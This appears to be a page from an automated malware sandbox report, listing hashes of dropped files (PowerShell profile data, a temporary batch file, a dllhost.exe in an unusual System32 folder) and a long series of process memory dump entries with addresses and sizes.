fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
3c733ea9ca3dd334197837664de145e1

SHA1
1baf6b92467c2f27d3fa81f426b117bc2b4dbfe9

SHA256
3c0b1ce9aa2e036fc76935f569082742e2787793cc28e2b021a139c427032a4f

SHA512
bebe6ad465612f7977b83a18630056f0c059b07ae1b36ea1b26df9bfd87b3babbcbc18f9951f20705df07c8f0d1514eba65a9c253a8b04b08899ec92477acc24

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
60ac2cb1b6760f20954109b4a2b99d60

SHA1
35d7ad8f83063cc41491416d7e81bf47888d54f1

SHA256
4dda1242b76c2f85cbbe33efe348f83d461e175017ce2175f5193f8c5dbf3297

SHA512
229e21a15143270ef8a0c0f68ec8c417a7a6b365311620247516b571069a26fc42cec763e66e92d2fb94b09db6b88a0c422684f4e0aa96890b73b439babe97f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
60ac2cb1b6760f20954109b4a2b99d60

SHA1
35d7ad8f83063cc41491416d7e81bf47888d54f1

SHA256
4dda1242b76c2f85cbbe33efe348f83d461e175017ce2175f5193f8c5dbf3297

SHA512
229e21a15143270ef8a0c0f68ec8c417a7a6b365311620247516b571069a26fc42cec763e66e92d2fb94b09db6b88a0c422684f4e0aa96890b73b439babe97f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
88b23462589fdf154f0ce30b4e8f5f1e

SHA1
4b26e6a0852561968d5104d93a0522afad0d17f7

SHA256
0c6742459ae1531f9d1fc1b3d8ba529f2e564183426465a85da907b28ce2bd0c

SHA512
cf92b667d15828dd8f9fbc63362fedd24f6219a4d46289f529a4d71b96175de77612b0ad34ca5a143ddd83100cb4ed8e09376ce43e6d033b0e46f337a77144e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
b0c039221c2d4e57a177347aeb339cc4

SHA1
ecf9f2d94c2c76fb2c8018699fe3e417d41348c2

SHA256
80cf091d51a37aa882c6c08d560e87c8054f9508b6724181b1f9733d8d90181c

SHA512
da0568cf013606df74c75b9cf64296c7376612181bf75be83a3a86a348b1b237878045d62e1d1f2d78540b6f4529a47c70fd5709ea76c31c150df66ba45f2b66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
667579921dc4ede80c027ee4ee18db02

SHA1
cf7f5eaf9898e960a42a3437e9c0467f5049d14b

SHA256
930ab12cc774017fd028d111f23d05eb506111bcb20c722c3f91af9727aa92d6

SHA512
7d825e979df9718e4084643504f1ab74b61757b4a47ac4ea4998f6bff1f98f734a0c62a1588b9e4dea47776483a64eceff709bec091611145ee41b7273e6cba0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
f1eb3dfdefe2683ebf288292acce8d66

SHA1
84dced2b70a35256566378bc4e635f21114feed0

SHA256
205725677398bd3c7484d4635de12bdda9b01c2577a6e159ee1a22d987b9324b

SHA512
0817190024c48bd62db13301c29e23f4db9f3e2522e4762fdce23aad9301c8dcc04b9ec07013e9dd04418a9dc86af5b2e0c0476c79eefd453724afba53ea54f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
f1eb3dfdefe2683ebf288292acce8d66

SHA1
84dced2b70a35256566378bc4e635f21114feed0

SHA256
205725677398bd3c7484d4635de12bdda9b01c2577a6e159ee1a22d987b9324b

SHA512
0817190024c48bd62db13301c29e23f4db9f3e2522e4762fdce23aad9301c8dcc04b9ec07013e9dd04418a9dc86af5b2e0c0476c79eefd453724afba53ea54f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
8a8f06600c48f208d229817f637462d1

SHA1
8a7da626ad842e4e7a4812382453af638a8d6828

SHA256
c3c30168df78bd6ff2ef31005eff38df4ceb06830a15dc6214593709279de5ac

SHA512
3fe82823a45e9de0388daf772c75b1804510a11c4bf5e3dbf91400556023f6ab40b469320f1992226601eb16a75df17c7029c68bbd22499078c1b81c9d63364b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
8a8f06600c48f208d229817f637462d1

SHA1
8a7da626ad842e4e7a4812382453af638a8d6828

SHA256
c3c30168df78bd6ff2ef31005eff38df4ceb06830a15dc6214593709279de5ac

SHA512
3fe82823a45e9de0388daf772c75b1804510a11c4bf5e3dbf91400556023f6ab40b469320f1992226601eb16a75df17c7029c68bbd22499078c1b81c9d63364b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
9fde1078cad1c829bf3c079c859216ad

SHA1
6a1e7fe480c67bd390ea55326f88c534ef7739a0

SHA256
7df8d471258362624148379c9377abfbd02ed2e5b7802bff059a4708f66058b0

SHA512
a4c03b62081430c57ad8fd6f42253d5621f88e4ec6f74d6685de49fe902def7a8d143dc8b58c25589cd0f8f74fdab6299b0460314efbdd0e48f6bbde98853886

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
ef375b6f534f50e899ad1f94274a6bd9

SHA1
043e43ca7bf572390d2018142967fd7072b60b33

SHA256
e9592a512041e0bd21af78de307ab18999248fa3c885e7b4abc92c651de3536c

SHA512
81d466443a19110ce9db7e1d69e234a9588de73b9adb42df19844132d9d7a9fef5f4deb471766446a0f6694375a38ac0722714dd45d7992c5e02e7ae29471cb1

Download Submit
C:\Users\Admin\AppData\Local\Temp\QO4U6mpYDF.bat

MD5
af037c49f4f7e2928e8b870be8137ba5

SHA1
840cf07656073c6b52c8914e8c5ec0d9f3aa5e7e

SHA256
362fb7d9ce4d7443dd08feb91b435cc5f7ab327c1f7ab7722f9ffc6dfe134f82

SHA512
0f8940b2112ea6c97dbee23cb58636b65c190c4c7caace1de696074b3f8d61105af7db525b5817d4a53c116e7bdf282badf4f0c8cd69b153ce1f3e17cabb67bb

Download Submit
C:\Windows\System32\BackgroundTransferHost\dllhost.exe

MD5
9c0182987fea6a2e8e517606d06346b1

SHA1
cc8b28475fecd46132cf19660c1911c324eab032

SHA256
4c7a2c1f64dc9c44c4f5380bd0a847a30acc0050a73efbcca760453951688b56

SHA512
bd683b2446c8cf4f4e79ac9929e7fff0e86de28dcc5933f3f9b6650d6be412dc6eec45e3c08181143b7060193095e0b6780c569823f038c18b1abac7631469d3

Download Submit
C:\Windows\System32\BackgroundTransferHost\dllhost.exe

MD5
9c0182987fea6a2e8e517606d06346b1

SHA1
cc8b28475fecd46132cf19660c1911c324eab032

SHA256
4c7a2c1f64dc9c44c4f5380bd0a847a30acc0050a73efbcca760453951688b56

SHA512
bd683b2446c8cf4f4e79ac9929e7fff0e86de28dcc5933f3f9b6650d6be412dc6eec45e3c08181143b7060193095e0b6780c569823f038c18b1abac7631469d3

Download Submit
memory/196-368-0x000001876A716000-0x000001876A718000-memory.dmp

Filesize
8KB

Download
memory/196-596-0x000001876A718000-0x000001876A719000-memory.dmp

Filesize
4KB

Download
memory/196-220-0x000001876A710000-0x000001876A712000-memory.dmp

Filesize
8KB

Download
memory/196-222-0x000001876A713000-0x000001876A715000-memory.dmp

Filesize
8KB

Download
memory/196-183-0x0000000000000000-mapping.dmp

Download
memory/500-593-0x0000019DBB578000-0x0000019DBB579000-memory.dmp

Filesize
4KB

Download
memory/500-292-0x0000019DBB576000-0x0000019DBB578000-memory.dmp

Filesize
8KB

Download
memory/500-228-0x0000019DBB573000-0x0000019DBB575000-memory.dmp

Filesize
8KB

Download
memory/500-226-0x0000019DBB570000-0x0000019DBB572000-memory.dmp

Filesize
8KB

Download
memory/500-197-0x0000000000000000-mapping.dmp

Download
memory/640-127-0x0000000000000000-mapping.dmp

Download
memory/688-145-0x000000001AC20000-0x000000001AC22000-memory.dmp

Filesize
8KB

Download
memory/688-146-0x000000001AC60000-0x000000001AC62000-memory.dmp

Filesize
8KB

Download
memory/688-136-0x0000000000000000-mapping.dmp

Download
memory/688-141-0x000000001ADD0000-0x000000001ADD2000-memory.dmp

Filesize
8KB

Download
memory/688-142-0x000000001ABF0000-0x000000001ABF5000-memory.dmp

Filesize
20KB

Download
memory/688-143-0x000000001AC00000-0x000000001AC02000-memory.dmp

Filesize
8KB

Download
memory/688-144-0x000000001AC30000-0x000000001AC31000-memory.dmp

Filesize
4KB

Download
memory/936-135-0x0000000000000000-mapping.dmp

Download
memory/936-595-0x000001FFD6728000-0x000001FFD6729000-memory.dmp

Filesize
4KB

Download
memory/936-184-0x0000000000000000-mapping.dmp

Download
memory/936-232-0x000001FFD6723000-0x000001FFD6725000-memory.dmp

Filesize
8KB

Download
memory/936-229-0x000001FFD6720000-0x000001FFD6722000-memory.dmp

Filesize
8KB

Download
memory/936-364-0x000001FFD6726000-0x000001FFD6728000-memory.dmp

Filesize
8KB

Download
memory/1172-240-0x000001B8738C3000-0x000001B8738C5000-memory.dmp

Filesize
8KB

Download
memory/1172-239-0x000001B8738C0000-0x000001B8738C2000-memory.dmp

Filesize
8KB

Download
memory/1172-202-0x0000000000000000-mapping.dmp

Download
memory/1172-600-0x000001B8738C8000-0x000001B8738C9000-memory.dmp

Filesize
4KB

Download
memory/1172-428-0x000001B8738C6000-0x000001B8738C8000-memory.dmp

Filesize
8KB

Download
memory/2088-130-0x0000000000000000-mapping.dmp

Download
memory/2188-126-0x0000000000000000-mapping.dmp

Download
memory/2272-215-0x0000023CDD9B0000-0x0000023CDD9B2000-memory.dmp

Filesize
8KB

Download
memory/2272-191-0x0000000000000000-mapping.dmp

Download
memory/2272-218-0x0000023CDD9B3000-0x0000023CDD9B5000-memory.dmp

Filesize
8KB

Download
memory/2272-425-0x0000023CDD9B6000-0x0000023CDD9B8000-memory.dmp

Filesize
8KB

Download
memory/2272-602-0x0000023CDD9B8000-0x0000023CDD9B9000-memory.dmp

Filesize
4KB

Download
memory/2352-119-0x0000000000000000-mapping.dmp

Download
memory/2448-128-0x0000000000000000-mapping.dmp

Download
memory/2748-597-0x0000029722388000-0x0000029722389000-memory.dmp

Filesize
4KB

Download
memory/2748-371-0x0000029722386000-0x0000029722388000-memory.dmp

Filesize
8KB

Download
memory/2748-185-0x0000000000000000-mapping.dmp

Download
memory/2748-249-0x0000029722383000-0x0000029722385000-memory.dmp

Filesize
8KB

Download
memory/2748-235-0x0000029722380000-0x0000029722382000-memory.dmp

Filesize
8KB

Download
memory/2904-246-0x000002C6A0AD3000-0x000002C6A0AD5000-memory.dmp

Filesize
8KB

Download
memory/2904-459-0x000002C6A0AD6000-0x000002C6A0AD8000-memory.dmp

Filesize
8KB

Download
memory/2904-244-0x000002C6A0AD0000-0x000002C6A0AD2000-memory.dmp

Filesize
8KB

Download
memory/2904-208-0x0000000000000000-mapping.dmp

Download
memory/2904-598-0x000002C6A0AD8000-0x000002C6A0AD9000-memory.dmp

Filesize
4KB

Download
memory/3240-134-0x0000000000000000-mapping.dmp

Download
memory/3296-123-0x0000000000300000-0x0000000000301000-memory.dmp

Filesize
4KB

Download
memory/3296-120-0x0000000000000000-mapping.dmp

Download
memory/3296-125-0x000000001B0D0000-0x000000001B0D2000-memory.dmp

Filesize
8KB

Download
memory/3976-131-0x0000000000000000-mapping.dmp

Download
memory/3984-147-0x0000000000000000-mapping.dmp

Download
memory/3984-159-0x000001BFA28C3000-0x000001BFA28C5000-memory.dmp

Filesize
8KB

Download
memory/3984-158-0x000001BFA28C0000-0x000001BFA28C2000-memory.dmp

Filesize
8KB

Download
memory/3984-160-0x000001BFA28C6000-0x000001BFA28C8000-memory.dmp

Filesize
8KB

Download
memory/3984-155-0x000001BFBB050000-0x000001BFBB051000-memory.dmp

Filesize
4KB

Download
memory/3984-152-0x000001BFBAEA0000-0x000001BFBAEA1000-memory.dmp

Filesize
4KB

Download
memory/4008-129-0x0000000000000000-mapping.dmp

Download
memory/4056-132-0x0000000000000000-mapping.dmp

Download
memory/4080-331-0x00000285BF786000-0x00000285BF788000-memory.dmp

Filesize
8KB

Download
memory/4080-209-0x00000285BF780000-0x00000285BF782000-memory.dmp

Filesize
8KB

Download
memory/4080-116-0x0000000000000000-mapping.dmp

Download
memory/4080-211-0x00000285BF783000-0x00000285BF785000-memory.dmp

Filesize
8KB

Download
memory/4080-592-0x00000285BF788000-0x00000285BF789000-memory.dmp

Filesize
4KB

Download
memory/4080-182-0x0000000000000000-mapping.dmp

Download
memory/4184-603-0x000002A12E2F8000-0x000002A12E2F9000-memory.dmp

Filesize
4KB

Download
memory/4184-216-0x0000000000000000-mapping.dmp

Download
memory/4184-280-0x000002A12E2F3000-0x000002A12E2F5000-memory.dmp

Filesize
8KB

Download
memory/4184-278-0x000002A12E2F0000-0x000002A12E2F2000-memory.dmp

Filesize
8KB

Download
memory/4184-467-0x000002A12E2F6000-0x000002A12E2F8000-memory.dmp

Filesize
8KB

Download
memory/4308-283-0x0000029B99CF3000-0x0000029B99CF5000-memory.dmp

Filesize
8KB

Download
memory/4308-465-0x0000029B99CF6000-0x0000029B99CF8000-memory.dmp

Filesize
8KB

Download
memory/4308-282-0x0000029B99CF0000-0x0000029B99CF2000-memory.dmp

Filesize
8KB

Download
memory/4308-601-0x0000029B99CF8000-0x0000029B99CF9000-memory.dmp

Filesize
4KB

Download
memory/4308-223-0x0000000000000000-mapping.dmp

Download
memory/4436-462-0x000001D4372E6000-0x000001D4372E8000-memory.dmp

Filesize
8KB

Download
memory/4436-604-0x000001D4372E8000-0x000001D4372E9000-memory.dmp

Filesize
4KB

Download
memory/4436-233-0x0000000000000000-mapping.dmp

Download
memory/4436-285-0x000001D4372E0000-0x000001D4372E2000-memory.dmp

Filesize
8KB

Download
memory/4436-289-0x000001D4372E3000-0x000001D4372E5000-memory.dmp

Filesize
8KB

Download
memory/4560-290-0x000001AD016F0000-0x000001AD016F2000-memory.dmp

Filesize
8KB

Download
memory/4560-295-0x000001AD016F3000-0x000001AD016F5000-memory.dmp

Filesize
8KB

Download
memory/4560-599-0x000001AD016F8000-0x000001AD016F9000-memory.dmp

Filesize
4KB

Download
memory/4560-521-0x000001AD016F6000-0x000001AD016F8000-memory.dmp

Filesize
8KB

Download
memory/4560-243-0x0000000000000000-mapping.dmp

Download